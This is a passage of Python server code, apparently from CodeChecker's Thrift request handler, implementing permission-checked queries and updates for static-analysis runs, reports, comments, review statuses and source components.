self.__auth_session) for perm in required]): raise shared.ttypes.RequestFailed( shared.ttypes.ErrorCode.UNAUTHORIZED, "You are not authorized to execute this action.") return True def __require_admin(self): self.__require_permission([permissions.PRODUCT_ADMIN]) def __require_access(self): self.__require_permission([permissions.PRODUCT_ACCESS]) def __require_store(self): self.__require_permission([permissions.PRODUCT_STORE]) @staticmethod def __get_run_ids_to_query(session, cmp_data=None): """ Return run id list for the queries. If compare data is set remove those run ids from the returned list. The returned run id list can be used as a baseline for comparisons. """ res = session.query(Run.id).all() run_ids = [r[0] for r in res] if cmp_data: all_rids = set(run_ids) cmp_rids = set(cmp_data.runIds) if cmp_data.runIds else set() run_ids = list(all_rids.difference(cmp_rids)) return run_ids @exc_to_thrift_reqfail @timeit def getRunData(self, run_filter): self.__require_access() with DBSession(self.__Session) as session: # Count the reports subquery. stmt = session.query(Report.run_id, func.count(Report.bug_id) .label('report_count')) stmt = filter_unresolved_reports(stmt) \ .group_by(Report.run_id).subquery() tag_q = session.query(RunHistory.run_id, func.max(RunHistory.id).label( 'run_history_id'), func.max(RunHistory.time).label( 'run_history_time')) \ .group_by(RunHistory.run_id) \ .subquery() q = session.query(Run, RunHistory.version_tag, RunHistory.cc_version, stmt.c.report_count) if run_filter is not None: if run_filter.ids is not None: q = q.filter(Run.id.in_(run_filter.ids)) if run_filter.names is not None: if run_filter.exactMatch: q = q.filter(Run.name.in_(run_filter.names)) else: OR = [Run.name.ilike('{0}'.format(conv( util.escape_like(name, '\\'))), escape='\\') for name in run_filter.names] q = q.filter(or_(*OR)) q = q.outerjoin(stmt, Run.id == stmt.c.run_id) \ .outerjoin(tag_q, Run.id == tag_q.c.run_id) \ .outerjoin(RunHistory, RunHistory.id == tag_q.c.run_history_id) \ .group_by(Run.id, RunHistory.version_tag, RunHistory.cc_version, stmt.c.report_count) \ .order_by(Run.date) # Get report count for each detection statuses. status_q = session.query(Report.run_id, Report.detection_status, func.count(Report.bug_id)) if run_filter and run_filter.ids is not None: status_q = status_q.filter(Report.run_id.in_(run_filter.ids)) status_q = status_q.group_by(Report.run_id, Report.detection_status) status_sum = defaultdict(defaultdict) for run_id, status, count in status_q: status_sum[run_id][detection_status_enum(status)] = count # Get analyzer statistics. analyzer_statistics = defaultdict(lambda: defaultdict()) stat_q = session.query(AnalyzerStatistic, Run.id) if run_filter and run_filter.ids is not None: stat_q = stat_q.filter(Run.id.in_(run_filter.ids)) stat_q = stat_q \ .outerjoin(RunHistory, RunHistory.id == AnalyzerStatistic.run_history_id) \ .outerjoin(Run, Run.id == RunHistory.run_id) for stat, run_id in stat_q: failed_files = zlib.decompress(stat.failed_files).split('\n') \ if stat.failed_files else None analyzer_version = zlib.decompress(stat.version) \ if stat.version else None analyzer_statistics[run_id][stat.analyzer_type] = \ ttypes.AnalyzerStatistics(version=analyzer_version, failed=stat.failed, failedFilePaths=failed_files, successful=stat.successful) results = [] for instance, tag, cc_version, report_count in q: if report_count is None: report_count = 0 results.append(RunData(instance.id, str(instance.date), instance.name, instance.duration, report_count, instance.command, status_sum[instance.id], tag, cc_version, analyzer_statistics[instance.id])) return results @exc_to_thrift_reqfail @timeit def getRunHistory(self, run_ids, limit, offset, run_history_filter): self.__require_access() with DBSession(self.__Session) as session: res = session.query(RunHistory) if run_ids: res = res.filter(RunHistory.run_id.in_(run_ids)) if run_history_filter: res = res.filter(RunHistory.version_tag.in_( run_history_filter.tagNames)) res = res.order_by(RunHistory.time.desc()) if limit: res = res.limit(limit).offset(offset) results = [] for history in res: check_command = zlib.decompress(history.check_command) \ if history.check_command else None analyzer_statistics = {} for stat in history.analyzer_statistics: failed_files = zlib.decompress(stat.failed_files) \ .split('\n') if stat.failed_files else None analyzer_version = zlib.decompress(stat.version) \ if stat.version else None analyzer_statistics[stat.analyzer_type] = \ ttypes.AnalyzerStatistics( version=analyzer_version, failed=stat.failed, failedFilePaths=failed_files, successful=stat.successful) results.append(RunHistoryData( id=history.id, runId=history.run.id, runName=history.run.name, versionTag=history.version_tag, user=history.user, time=str(history.time), checkCommand=check_command, codeCheckerVersion=history.cc_version, analyzerStatistics=analyzer_statistics)) return results @exc_to_thrift_reqfail @timeit def getReport(self, reportId): self.__require_access() with DBSession(self.__Session) as session: result = session.query(Report, File, ReviewStatus) \ .filter(Report.id == reportId) \ .outerjoin(File, Report.file_id == File.id) \ .outerjoin(ReviewStatus, ReviewStatus.bug_hash == Report.bug_id) \ .limit(1).one_or_none() if not result: raise shared.ttypes.RequestFailed( shared.ttypes.ErrorCode.DATABASE, "Report " + str(reportId) + " not found!") report, source_file, review_status = result return ReportData( runId=report.run_id, bugHash=report.bug_id, checkedFile=source_file.filepath, checkerMsg=report.checker_message, reportId=report.id, fileId=source_file.id, line=report.line, column=report.column, checkerId=report.checker_id, severity=report.severity, reviewData=create_review_data(review_status), detectionStatus=detection_status_enum(report.detection_status), detectedAt=str(report.detected_at), fixedAt=str(report.fixed_at) if report.fixed_at else None) @exc_to_thrift_reqfail @timeit def getDiffResultsHash(self, run_ids, report_hashes, diff_type): self.__require_access() with DBSession(self.__Session) as session: if diff_type == DiffType.NEW: # In postgresql we can select multiple rows filled with # constants by using `unnest` function. In sqlite we have to # use multiple UNION ALL. if not report_hashes: return [] base_hashes = session.query(Report.bug_id.label('bug_id')) \ .outerjoin(File, Report.file_id == File.id) \ .filter(Report.run_id.in_(run_ids)) if self.__product.driver_name == 'postgresql': new_hashes = select([func.unnest(report_hashes) .label('bug_id')]) \ .except_(base_hashes).alias('new_bugs') return [res[0] for res in session.query(new_hashes)] else: # The maximum number of compound select in sqlite is 500 # by default. We increased SQLITE_MAX_COMPOUND_SELECT # limit but when the number of compound select was larger # than 8435 sqlite threw a `Segmentation fault` error. # For this reason we create queries with chunks. new_hashes = [] chunk_size = 500 for chunk in [report_hashes[i:i + chunk_size] for i in range(0, len(report_hashes), chunk_size)]: new_hashes_query = union_all(*[ select([bindparam('bug_id' + str(i), h) .label('bug_id')]) for i, h in enumerate(chunk)]) q = select([new_hashes_query]).except_(base_hashes) new_hashes.extend([res[0] for res in session.query(q)]) return new_hashes elif diff_type == DiffType.RESOLVED: results = session.query(Report.bug_id) \ .filter(Report.run_id.in_(run_ids)) \ .filter(Report.bug_id.notin_(report_hashes)) \ .all() return [res[0] for res in results] elif diff_type == DiffType.UNRESOLVED: results = session.query(Report.bug_id) \ .filter(Report.run_id.in_(run_ids)) \ .filter(Report.bug_id.in_(report_hashes)) \ .all() return [res[0] for res in results] else: return [] @exc_to_thrift_reqfail @timeit def getRunResults(self, run_ids, limit, offset, sort_types, report_filter, cmp_data): self.__require_access() max_query_limit = constants.MAX_QUERY_SIZE if limit > max_query_limit: LOG.debug('Query limit ' + str(limit) + ' was larger than max query limit ' + str(max_query_limit) + ', setting limit to ' + str(max_query_limit)) limit = max_query_limit with DBSession(self.__Session) as session: results = [] diff_hashes = None if cmp_data: diff_hashes, run_ids = self._cmp_helper(session, run_ids, report_filter, cmp_data) if not diff_hashes: # There is no difference. return results filter_expression = process_report_filter(session, report_filter) is_unique = report_filter is not None and report_filter.isUnique if is_unique: sort_types, sort_type_map, order_type_map = \ get_sort_map(sort_types, True) selects = [func.max(Report.id).label('id')] for sort in sort_types: sorttypes = sort_type_map.get(sort.type) for sorttype in sorttypes: if sorttype[0] != 'bug_path_length': selects.append(func.max(sorttype[0]) .label(sorttype[1])) unique_reports = session.query(*selects) unique_reports = filter_report_filter(unique_reports, filter_expression, run_ids, cmp_data, diff_hashes) unique_reports = unique_reports \ .group_by(Report.bug_id) \ .subquery() # Sort the results sorted_reports = \ session.query(unique_reports.c.id) sorted_reports = sort_results_query(sorted_reports, sort_types, sort_type_map, order_type_map, True) sorted_reports = sorted_reports \ .limit(limit).offset(offset).subquery() q = session.query(Report.id, Report.bug_id, Report.checker_message, Report.checker_id, Report.severity, Report.detected_at, Report.fixed_at, ReviewStatus, File.filename, File.filepath, Report.path_length) \ .outerjoin(File, Report.file_id == File.id) \ .outerjoin(ReviewStatus, ReviewStatus.bug_hash == Report.bug_id) \ .outerjoin(sorted_reports, sorted_reports.c.id == Report.id) \ .filter(sorted_reports.c.id.isnot(None)) # We have to sort the results again because an ORDER BY in a # subtable is broken by the JOIN. q = sort_results_query(q, sort_types, sort_type_map, order_type_map) for report_id, bug_id, checker_msg, checker, severity, \ detected_at, fixed_at, status, filename, path, \ bug_path_len in q: review_data = create_review_data(status) results.append( ReportData(bugHash=bug_id, checkedFile=filename, checkerMsg=checker_msg, checkerId=checker, severity=severity, reviewData=review_data, detectedAt=str(detected_at), fixedAt=str(fixed_at), bugPathLength=bug_path_len)) else: q = session.query(Report.run_id, Report.id, Report.file_id, Report.line, Report.column, Report.detection_status, Report.bug_id, Report.checker_message, Report.checker_id, Report.severity, Report.detected_at, Report.fixed_at, ReviewStatus, File.filepath, Report.path_length) \ .outerjoin(File, Report.file_id == File.id) \ .outerjoin(ReviewStatus, ReviewStatus.bug_hash == Report.bug_id) \ .filter(filter_expression) if run_ids: q = q.filter(Report.run_id.in_(run_ids)) if cmp_data: q = q.filter(Report.bug_id.in_(diff_hashes)) sort_types, sort_type_map, order_type_map = \ get_sort_map(sort_types) q = sort_results_query(q, sort_types, sort_type_map, order_type_map) q = q.limit(limit).offset(offset) for run_id, report_id, file_id, line, column, d_status, \ bug_id, checker_msg, checker, severity, detected_at,\ fixed_at, r_status, path, bug_path_len \ in q: review_data = create_review_data(r_status) results.append( ReportData(runId=run_id, bugHash=bug_id, checkedFile=path, checkerMsg=checker_msg, reportId=report_id, fileId=file_id, line=line, column=column, checkerId=checker, severity=severity, reviewData=review_data, detectionStatus=detection_status_enum( d_status), detectedAt=str(detected_at), fixedAt=str(fixed_at) if fixed_at else None, bugPathLength=bug_path_len)) return results @timeit def getRunReportCounts(self, run_ids, report_filter, limit, offset): """ Count the results separately for multiple runs. If an empty run id list is provided the report counts will be calculated for all of the available runs. """ self.__require_access() results = [] with DBSession(self.__Session) as session: filter_expression = process_report_filter(session, report_filter) count_expr = create_count_expression(report_filter) q = session.query(Run.id, Run.name, count_expr) \ .select_from(Report) if run_ids: q = q.filter(Report.run_id.in_(run_ids)) q = q.outerjoin(File, Report.file_id == File.id) \ .outerjoin(ReviewStatus, ReviewStatus.bug_hash == Report.bug_id) \ .outerjoin(Run, Report.run_id == Run.id) \ .filter(filter_expression) \ .order_by(Run.name) \ .group_by(Run.id) if limit: q = q.limit(limit).offset(offset) for run_id, run_name, count in q: report_count = RunReportCount(runId=run_id, name=run_name, reportCount=count) results.append(report_count) return results @exc_to_thrift_reqfail @timeit def getRunResultCount(self, run_ids, report_filter, cmp_data): self.__require_access() with DBSession(self.__Session) as session: diff_hashes = None if cmp_data: diff_hashes, run_ids = self._cmp_helper(session, run_ids, report_filter, cmp_data) if not diff_hashes: # There is no difference. return 0 filter_expression = process_report_filter(session, report_filter) q = session.query(Report.bug_id) q = filter_report_filter(q, filter_expression, run_ids, cmp_data, diff_hashes) if report_filter is not None and report_filter.isUnique: q = q.group_by(Report.bug_id) report_count = q.count() if report_count is None: report_count = 0 return report_count @staticmethod @timeit def __construct_bug_item_list(session, report_id, item_type): q = session.query(item_type) \ .filter(item_type.report_id == report_id) \ .order_by(item_type.order) bug_items = [] for event in q: f = session.query(File).get(event.file_id) bug_items.append((event, f.filepath)) return bug_items @exc_to_thrift_reqfail @timeit def getReportDetails(self, reportId): """ Parameters: - reportId """ self.__require_access() with DBSession(self.__Session) as session: report = session.query(Report).get(reportId) events = ThriftRequestHandler.__construct_bug_item_list( session, report.id, BugPathEvent) bug_events_list = [] for event, file_path in events: event = bugpathevent_db_to_api(event) event.filePath = file_path bug_events_list.append(event) points = ThriftRequestHandler.__construct_bug_item_list( session, report.id, BugReportPoint) bug_point_list = [] for bug_point, file_path in points: bug_point = bugreportpoint_db_to_api(bug_point) bug_point.filePath = file_path bug_point_list.append(bug_point) return ReportDetails(bug_events_list, bug_point_list) def _setReviewStatus(self, report_id, status, message, session): """ This function sets the review status of the given report. This is the implementation of changeReviewStatus(), but it is also extended with a session parameter which represents a database transaction. This is needed because during storage a specific session object has to be used. """ self.__require_permission([permissions.PRODUCT_ACCESS, permissions.PRODUCT_STORE]) report = session.query(Report).get(report_id) if report: review_status = session.query(ReviewStatus).get(report.bug_id) if review_status is None: review_status = ReviewStatus() review_status.bug_hash = report.bug_id user = self.__auth_session.user \ if self.__auth_session else "Anonymous" review_status.status = review_status_str(status) review_status.author = user review_status.message = message review_status.date = datetime.now() session.add(review_status) session.flush() return True else: msg = "No report found in the database." raise shared.ttypes.RequestFailed( shared.ttypes.ErrorCode.DATABASE, msg) @exc_to_thrift_reqfail @timeit def changeReviewStatus(self, report_id, status, message): """ Change review status of the bug by report id. """ with DBSession(self.__Session) as session: res = self._setReviewStatus(report_id, status, message, session) session.commit() return res @exc_to_thrift_reqfail @timeit def getComments(self, report_id): """ Return the list of comments for the given bug. """ self.__require_access() with DBSession(self.__Session) as session: report = session.query(Report).get(report_id) if report: result = [] comments = session.query(Comment) \ .filter(Comment.bug_hash == report.bug_id) \ .order_by(Comment.created_at.desc()) \ .all() for comment in comments: result.append(CommentData( comment.id, comment.author, comment.message, str(comment.created_at))) return result else: msg = 'Report id ' + str(report_id) + \ ' was not found in the database.' raise shared.ttypes.RequestFailed( shared.ttypes.ErrorCode.DATABASE, msg) @exc_to_thrift_reqfail @timeit def getCommentCount(self, report_id): """ Return the number of comments for the given bug. """ self.__require_access() with DBSession(self.__Session) as session: report = session.query(Report).get(report_id) if report: commentCount = session.query(Comment) \ .filter(Comment.bug_hash == report.bug_id) \ .count() if commentCount is None: commentCount = 0 return commentCount @exc_to_thrift_reqfail @timeit def addComment(self, report_id, comment_data): """ Add new comment for the given bug. """ self.__require_access() with DBSession(self.__Session) as session: report = session.query(Report).get(report_id) if report: user = self.__auth_session.user\ if self.__auth_session else "Anonymous" comment = Comment(report.bug_id, user, comment_data.message, datetime.now()) session.add(comment) session.commit() return True else: msg = 'Report id ' + str(report_id) + \ ' was not found in the database.' LOG.error(msg) raise shared.ttypes.RequestFailed( shared.ttypes.ErrorCode.DATABASE, msg) @exc_to_thrift_reqfail @timeit def updateComment(self, comment_id, content): """ Update the given comment message with new content. We allow comments to be updated by it's original author only, except for Anyonymous comments that can be updated by anybody. """ self.__require_access() with DBSession(self.__Session) as session: user = self.__auth_session.user \ if self.__auth_session else "Anonymous" comment = session.query(Comment).get(comment_id) if comment: if comment.author != 'Anonymous' and comment.author != user: raise shared.ttypes.RequestFailed( shared.ttypes.ErrorCode.UNAUTHORIZED, 'Unathorized comment modification!') comment.message = content session.add(comment) session.commit() return True else: msg = 'Comment id ' + str(comment_id) + \ ' was not found in the database.' LOG.error(msg) raise shared.ttypes.RequestFailed( shared.ttypes.ErrorCode.DATABASE, msg) @exc_to_thrift_reqfail @timeit def removeComment(self, comment_id): """ Remove the comment. We allow comments to be removed by it's original author only, except for Anyonymous comments that can be updated by anybody. """ self.__require_access() user = self.__auth_session.user \ if self.__auth_session else "Anonymous" with DBSession(self.__Session) as session: comment = session.query(Comment).get(comment_id) if comment: if comment.author != 'Anonymous' and comment.author != user: raise shared.ttypes.RequestFailed( shared.ttypes.ErrorCode.UNAUTHORIZED, 'Unathorized comment modification!') session.delete(comment) session.commit() return True else: msg = 'Comment id ' + str(comment_id) + \ ' was not found in the database.' raise shared.ttypes.RequestFailed( shared.ttypes.ErrorCode.DATABASE, msg) @exc_to_thrift_reqfail @timeit def getCheckerDoc(self, checkerId): """ Parameters: - checkerId """ missing_doc = "No documentation found for checker: " + checkerId + \ "\n\nPlease refer to the documentation at the " sa_link = "http://clang-analyzer.llvm.org/available_checks.html" tidy_link = "http://clang.llvm.org/extra/clang-tidy/checks/list.html" if "." in checkerId: missing_doc += "[ClangSA](" + sa_link + ")" elif "-" in checkerId: missing_doc += "[ClangTidy](" + tidy_link + ")" missing_doc += " homepage." try: md_file = self.__checker_doc_map.get(checkerId) if md_file: md_file = os.path.join(self.__checker_md_docs, md_file) try: with io.open(md_file, 'r') as md_content: missing_doc = md_content.read() except (IOError, OSError) as oerr: LOG.warning("Failed to read checker documentation: %s", md_file) return missing_doc except Exception as ex: msg = str(ex) raise shared.ttypes.RequestFailed(shared.ttypes.ErrorCode.IOERROR, msg) @exc_to_thrift_reqfail @timeit def getSourceFileData(self, fileId, fileContent, encoding): """ Parameters: - fileId - fileContent - enum Encoding """ self.__require_access() with DBSession(self.__Session) as session: sourcefile = session.query(File).get(fileId) if sourcefile is None: return SourceFileData() if fileContent: cont = session.query(FileContent).get(sourcefile.content_hash) source = zlib.decompress(cont.content) if not encoding or encoding == Encoding.DEFAULT: source = codecs.decode(source, 'utf-8', 'replace') elif encoding == Encoding.BASE64: source = base64.b64encode(source) return SourceFileData(fileId=sourcefile.id, filePath=sourcefile.filepath, fileContent=source) else: return SourceFileData(fileId=sourcefile.id, filePath=sourcefile.filepath) @exc_to_thrift_reqfail @timeit def getLinesInSourceFileContents(self, lines_in_files_requested, encoding): self.__require_access() with DBSession(self.__Session) as session: res = defaultdict(lambda: defaultdict(str)) for lines_in_file in lines_in_files_requested: sourcefile = session.query(File).get(lines_in_file.fileId) cont = session.query(FileContent).get(sourcefile.content_hash) lines = zlib.decompress(cont.content).split('\n') for line in lines_in_file.lines: content = '' if len(lines) < line else lines[line - 1] if not encoding or encoding == Encoding.DEFAULT: content = codecs.decode(content, 'utf-8', 'replace') elif encoding == Encoding.BASE64: content = base64.b64encode(content) res[lines_in_file.fileId][line] = content return res def _cmp_helper(self, session, run_ids, report_filter, cmp_data): """ Get the report hashes for all of the runs. Return the hash list which should be queried in the returned run id list. """ if not run_ids: run_ids = ThriftRequestHandler.__get_run_ids_to_query(session, cmp_data) base_run_ids = run_ids new_run_ids = cmp_data.runIds diff_type = cmp_data.diffType tag_ids = report_filter.runTag if report_filter else None base_line_hashes = get_report_hashes(session, base_run_ids, tag_ids) # If run tag is set in compare data, after base line hashes are # calculated remove it from the report filter because we will filter # results by these hashes and there is no need to filter results by # these tags again. if cmp_data.runTag: report_filter.runTag = None if not new_run_ids and not cmp_data.runTag: return base_line_hashes, base_run_ids new_check_hashes = get_report_hashes(session, new_run_ids, cmp_data.runTag) report_hashes, run_ids = \ get_diff_hashes_for_query(base_run_ids, base_line_hashes, new_run_ids, new_check_hashes, diff_type) return report_hashes, run_ids @exc_to_thrift_reqfail @timeit def getCheckerCounts(self, run_ids, report_filter, cmp_data, limit, offset): """ If the run id list is empty the metrics will be counted for all of the runs and in compare mode all of the runs will be used as a baseline excluding the runs in compare data. """ self.__require_access() results = [] with DBSession(self.__Session) as session: diff_hashes = None if cmp_data: diff_hashes, run_ids = self._cmp_helper(session, run_ids, report_filter, cmp_data) if not diff_hashes: # There is no difference. return results filter_expression = process_report_filter(session, report_filter) is_unique = report_filter is not None and report_filter.isUnique if is_unique: q = session.query(func.max(Report.checker_id).label( 'checker_id'), func.max(Report.severity).label( 'severity'), Report.bug_id) else: q = session.query(Report.checker_id, Report.severity, func.count(Report.id)) q = filter_report_filter(q, filter_expression, run_ids, cmp_data, diff_hashes) unique_checker_q = None if is_unique: q = q.group_by(Report.bug_id).subquery() unique_checker_q = session.query(q.c.checker_id, func.max(q.c.severity), func.count(q.c.bug_id)) \ .group_by(q.c.checker_id) \ .order_by(q.c.checker_id) else: unique_checker_q = q.group_by(Report.checker_id, Report.severity) \ .order_by(Report.checker_id) if limit: unique_checker_q = unique_checker_q.limit(limit).offset(offset) for name, severity, count in unique_checker_q: checker_count = CheckerCount(name=name, severity=severity, count=count) results.append(checker_count) return results @exc_to_thrift_reqfail @timeit def getSeverityCounts(self, run_ids, report_filter, cmp_data): """ If the run id list is empty the metrics will be counted for all of the runs and in compare mode all of the runs will be used as a baseline excluding the runs in compare data. """ self.__require_access() results = {} with DBSession(self.__Session) as session: diff_hashes = None if cmp_data: diff_hashes, run_ids = self._cmp_helper(session, run_ids, report_filter, cmp_data) if not diff_hashes: # There is no difference. return results filter_expression = process_report_filter(session, report_filter) is_unique = report_filter is not None and report_filter.isUnique if is_unique: q = session.query(func.max(Report.severity).label('severity'), Report.bug_id) else: q = session.query(Report.severity, func.count(Report.id)) q = filter_report_filter(q, filter_expression, run_ids, cmp_data, diff_hashes) severities = None if is_unique: q = q.group_by(Report.bug_id).subquery() severities = session.query(q.c.severity, func.count(q.c.bug_id)) \ .group_by(q.c.severity) else: severities = q.group_by(Report.severity) results = dict(severities) return results @exc_to_thrift_reqfail @timeit def getCheckerMsgCounts(self, run_ids, report_filter, cmp_data, limit, offset): """ If the run id list is empty the metrics will be counted for all of the runs and in compare mode all of the runs will be used as a baseline excluding the runs in compare data. """ self.__require_access() results = {} with DBSession(self.__Session) as session: diff_hashes = None if cmp_data: diff_hashes, run_ids = self._cmp_helper(session, run_ids, report_filter, cmp_data) if not diff_hashes: # There is no difference. return results filter_expression = process_report_filter(session, report_filter) is_unique = report_filter is not None and report_filter.isUnique if is_unique: q = session.query(func.max(Report.checker_message).label( 'checker_message'), Report.bug_id) else: q = session.query(Report.checker_message, func.count(Report.id)) q = filter_report_filter(q, filter_expression, run_ids, cmp_data, diff_hashes) checker_messages = None if is_unique: q = q.group_by(Report.bug_id).subquery() checker_messages = session.query(q.c.checker_message, func.count(q.c.bug_id)) \ .group_by(q.c.checker_message) \ .order_by(q.c.checker_message) else: checker_messages = q.group_by(Report.checker_message) \ .order_by(Report.checker_message) if limit: checker_messages = checker_messages.limit(limit).offset(offset) results = dict(checker_messages.all()) return results @exc_to_thrift_reqfail @timeit def getReviewStatusCounts(self, run_ids, report_filter, cmp_data): """ If the run id list is empty the metrics will be counted for all of the runs and in compare mode all of the runs will be used as a baseline excluding the runs in compare data. """ self.__require_access() results = defaultdict(int) with DBSession(self.__Session) as session: diff_hashes = None if cmp_data: diff_hashes, run_ids = self._cmp_helper(session, run_ids, report_filter, cmp_data) if not diff_hashes: # There is no difference. return results filter_expression = process_report_filter(session, report_filter) is_unique = report_filter is not None and report_filter.isUnique if is_unique: q = session.query(Report.bug_id, func.max(ReviewStatus.status).label( 'status')) else: q = session.query(func.max(Report.bug_id), ReviewStatus.status, func.count(Report.id)) q = filter_report_filter(q, filter_expression, run_ids, cmp_data, diff_hashes) review_statuses = None if is_unique: q = q.group_by(Report.bug_id).subquery() review_statuses = session.query(func.max(q.c.bug_id), q.c.status, func.count(q.c.bug_id)) \ .group_by(q.c.status) else: review_statuses = q.group_by(ReviewStatus.status) for _, rev_status, count in review_statuses: if rev_status is None: # If no review status is set count it as unreviewed. rev_status = ttypes.ReviewStatus.UNREVIEWED results[rev_status] += count else: rev_status = review_status_enum(rev_status) results[rev_status] += count return results @exc_to_thrift_reqfail @timeit def getFileCounts(self, run_ids, report_filter, cmp_data, limit, offset): """ If the run id list is empty the metrics will be counted for all of the runs and in compare mode all of the runs will be used as a baseline excluding the runs in compare data. """ self.__require_access() results = {} with DBSession(self.__Session) as session: if cmp_data: diff_hashes, run_ids = self._cmp_helper(session, run_ids, report_filter, cmp_data) if not diff_hashes: # There is no difference. return results filter_expression = process_report_filter(session, report_filter) stmt = session.query(Report.bug_id, Report.file_id) \ .outerjoin(ReviewStatus, ReviewStatus.bug_hash == Report.bug_id) \ .outerjoin(File, File.id == Report.file_id) \ .filter(filter_expression) if run_ids: stmt = stmt.filter(Report.run_id.in_(run_ids)) if report_filter is not None and report_filter.isUnique: stmt = stmt.group_by(Report.bug_id, Report.file_id) stmt = stmt.subquery() report_count = session.query(stmt.c.file_id, func.count(1).label( 'report_count')) \ .group_by(stmt.c.file_id) if limit: report_count = report_count.limit(limit).offset(offset) report_count = report_count.subquery() file_paths = session.query(File.filepath, report_count.c.report_count) \ .join(report_count, report_count.c.file_id == File.id) for fp, count in file_paths: results[fp] = count return results @exc_to_thrift_reqfail @timeit def getRunHistoryTagCounts(self, run_ids, report_filter, cmp_data): """ If the run id list is empty the metrics will be counted for all of the runs and in compare mode all of the runs will be used as a baseline excluding the runs in compare data. """ self.__require_access() results = [] with DBSession(self.__Session) as session: if cmp_data: diff_hashes, run_ids = self._cmp_helper(session, run_ids, report_filter, cmp_data) if not diff_hashes: # There is no difference. return results filter_expression = process_report_filter(session, report_filter) tag_run_ids = session.query(RunHistory.run_id.distinct()) \ .filter(RunHistory.version_tag.isnot(None)) \ .subquery() report_cnt_q = session.query(Report.run_id, Report.bug_id, Report.detected_at, Report.fixed_at) \ .outerjoin(File, Report.file_id == File.id) \ .outerjoin(ReviewStatus, ReviewStatus.bug_hash == Report.bug_id) \ .filter(filter_expression) \ .filter(Report.run_id.in_(tag_run_ids)) \ .subquery() is_unique = report_filter is not None and report_filter.isUnique count_expr = func.count(report_cnt_q.c.bug_id if not is_unique else report_cnt_q.c.bug_id.distinct()) count_q = session.query(RunHistory.id.label('run_history_id'), count_expr.label('report_count')) \ .outerjoin(report_cnt_q, report_cnt_q.c.run_id == RunHistory.run_id) \ .filter(RunHistory.version_tag.isnot(None)) \ .filter(and_(report_cnt_q.c.detected_at <= RunHistory.time, or_(report_cnt_q.c.fixed_at.is_(None), report_cnt_q.c.fixed_at >= RunHistory.time))) \ .group_by(RunHistory.id) \ .subquery() tag_q = session.query(RunHistory.run_id.label('run_id'), RunHistory.id.label('run_history_id')) \ .filter(RunHistory.version_tag.isnot(None)) if run_ids: tag_q = tag_q.filter(RunHistory.run_id.in_(run_ids)) tag_q = tag_q.subquery() q = session.query(tag_q.c.run_history_id, func.max(Run.name).label('run_name'), func.max(RunHistory.id), func.max(RunHistory.time), func.max(RunHistory.version_tag), func.max(count_q.c.report_count)) \ .outerjoin(RunHistory, RunHistory.id == tag_q.c.run_history_id) \ .outerjoin(Run, Run.id == tag_q.c.run_id) \ .outerjoin(count_q, count_q.c.run_history_id == RunHistory.id) \ .filter(RunHistory.version_tag.isnot(None)) \ .group_by(tag_q.c.run_history_id) \ .order_by('run_name') for _, run_name, tag_id, version_time, tag, count in q: if tag: results.append(RunTagCount(id=tag_id, time=str(version_time), name=tag, runName=run_name, count=count if count else 0)) return results @exc_to_thrift_reqfail @timeit def getDetectionStatusCounts(self, run_ids, report_filter, cmp_data): """ If the run id list is empty the metrics will be counted for all of the runs and in compare mode all of the runs will be used as a baseline excluding the runs in compare data. """ self.__require_access() results = {} with DBSession(self.__Session) as session: diff_hashes = None if cmp_data: diff_hashes, run_ids = self._cmp_helper(session, run_ids, report_filter, cmp_data) if not diff_hashes: # There is no difference. return results filter_expression = process_report_filter(session, report_filter) count_expr = func.count(literal_column('*')) q = session.query(Report.detection_status, count_expr) q = filter_report_filter(q, filter_expression, run_ids, cmp_data, diff_hashes) detection_stats = q.group_by(Report.detection_status).all() results = dict(detection_stats) results = {detection_status_enum(k): v for k, v in results.items()} return results # ----------------------------------------------------------------------- @timeit def getPackageVersion(self): return self.__package_version # ----------------------------------------------------------------------- @exc_to_thrift_reqfail @timeit def removeRunResults(self, run_ids): self.__require_store() failed = False for run_id in run_ids: try: self.removeRun(run_id) except Exception as ex: LOG.error("Failed to remove run: " + str(run_id)) LOG.error(ex) failed = True return not failed def __removeReports(self, session, report_ids, chunk_size=500): """ Removing reports in chunks. """ for r_ids in [report_ids[i:i + chunk_size] for i in range(0, len(report_ids), chunk_size)]: session.query(Report) \ .filter(Report.id.in_(r_ids)) \ .delete(synchronize_session=False) @exc_to_thrift_reqfail @timeit def removeRunReports(self, run_ids, report_filter, cmp_data): self.__require_store() if not run_ids: run_ids = [] if cmp_data and cmp_data.runIds: run_ids.extend(cmp_data.runIds) with DBSession(self.__Session) as session: check_remove_runs_lock(session, run_ids) try: diff_hashes = None if cmp_data: diff_hashes, _ = self._cmp_helper(session, run_ids, report_filter, cmp_data) if not diff_hashes: # There is no difference. return True filter_expression = process_report_filter(session, report_filter) q = session.query(Report.id) \ .outerjoin(File, Report.file_id == File.id) \ .outerjoin(ReviewStatus, ReviewStatus.bug_hash == Report.bug_id) \ .filter(filter_expression) if run_ids: q = q.filter(Report.run_id.in_(run_ids)) if cmp_data: q = q.filter(Report.bug_id.in_(diff_hashes)) reports_to_delete = [r[0] for r in q] if len(reports_to_delete) != 0: self.__removeReports(session, reports_to_delete) # Delete files and contents that are not present # in any bug paths. db_cleanup.remove_unused_files(session) session.commit() session.close() return True except Exception as ex: session.rollback() LOG.error("Database cleanup failed.") LOG.error(ex) return False @exc_to_thrift_reqfail @timeit def removeRun(self, run_id): self.__require_store() # Remove the whole run. with DBSession(self.__Session) as session: check_remove_runs_lock(session, [run_id]) session.query(Run) \ .filter(Run.id == run_id) \ .delete(synchronize_session=False) session.commit() session.close() return True @exc_to_thrift_reqfail def getSuppressFile(self): """ Return the suppress file path or empty string if not set. """ self.__require_access() suppress_file = self.__src_comment_handler.suppress_file if suppress_file: return suppress_file return '' @exc_to_thrift_reqfail @timeit def addSourceComponent(self, name, value, description): """ Adds a new source if it does not exist or updates an old one. """ self.__require_admin() with DBSession(self.__Session) as session: component = session.query(SourceComponent).get(name) user = self.__auth_session.user if self.__auth_session else None if component: component.value = value component.description = description component.user = user else: component = SourceComponent(name, value, description, user) session.add(component) session.commit() return True @exc_to_thrift_reqfail @timeit def getSourceComponents(self, component_filter): """ Returns the available source components. """ self.__require_access() with DBSession(self.__Session) as session: q = session.query(SourceComponent) if component_filter and len(component_filter): sql_component_filter = [SourceComponent.name.ilike(conv(cf)) for cf in component_filter] q = q.filter(*sql_component_filter) q = q.order_by(SourceComponent.name) return list(map(lambda c: SourceComponentData(c.name, c.value, c.description), q)) @exc_to_thrift_reqfail @timeit def removeSourceComponent(self, name): """ Removes a source component. """ self.__require_admin() with DBSession(self.__Session) as session: component = session.query(SourceComponent).get(name) if component: session.delete(component) session.commit() return True else: msg = 'Source component ' + str(name) + \ ' was not found in 